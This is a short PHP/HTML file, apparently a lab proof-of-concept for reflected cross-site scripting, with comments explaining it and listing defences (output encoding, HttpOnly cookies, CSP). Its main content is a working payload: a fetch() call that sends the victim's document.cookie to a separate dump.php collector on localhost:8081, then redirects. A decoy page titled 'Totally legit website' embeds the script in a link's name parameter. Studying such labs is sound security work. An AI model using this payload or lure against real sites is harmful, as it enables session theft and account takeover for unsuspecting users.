<?php
// Lab proof-of-concept for reflected XSS leading to cookie theft; every host here is localhost.
// The heredoc holds JavaScript, not PHP: `\$` stops PHP from interpolating, so the browser
// receives the JS template literal `${encodeURIComponent(document.cookie)}`.
// When executed, the script sends the cookies readable through document.cookie as the `data`
// query parameter to dump.php on port 8081, then navigates to /?name=Blegh
// (presumably so the visitor ends up on a normal-looking page).
// The template further down places this string inside <script> tags in the `name` parameter
// of a link to localhost:8080; presumably that page echoes `name` without HTML-encoding
// (the target is not shown here).
// Defensive takeaways: HTML-encode reflected parameters on output, mark session cookies
// HttpOnly so document.cookie cannot read them, and deploy a Content-Security-Policy that
// disallows inline scripts and restricts connect-src.
$payload = <<<EOS
fetch(`http://localhost:8081/dump.php?data=\${encodeURIComponent(document.cookie)}`).then(() => {window.location.href='/?name=Blegh';});
EOS
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Totally legit website</title>
</head>
<body>
<a href="http://localhost:8080/?name=Blegh<script><?= $payload ?></script>">This link has a nice picture</a>
</body>
</html>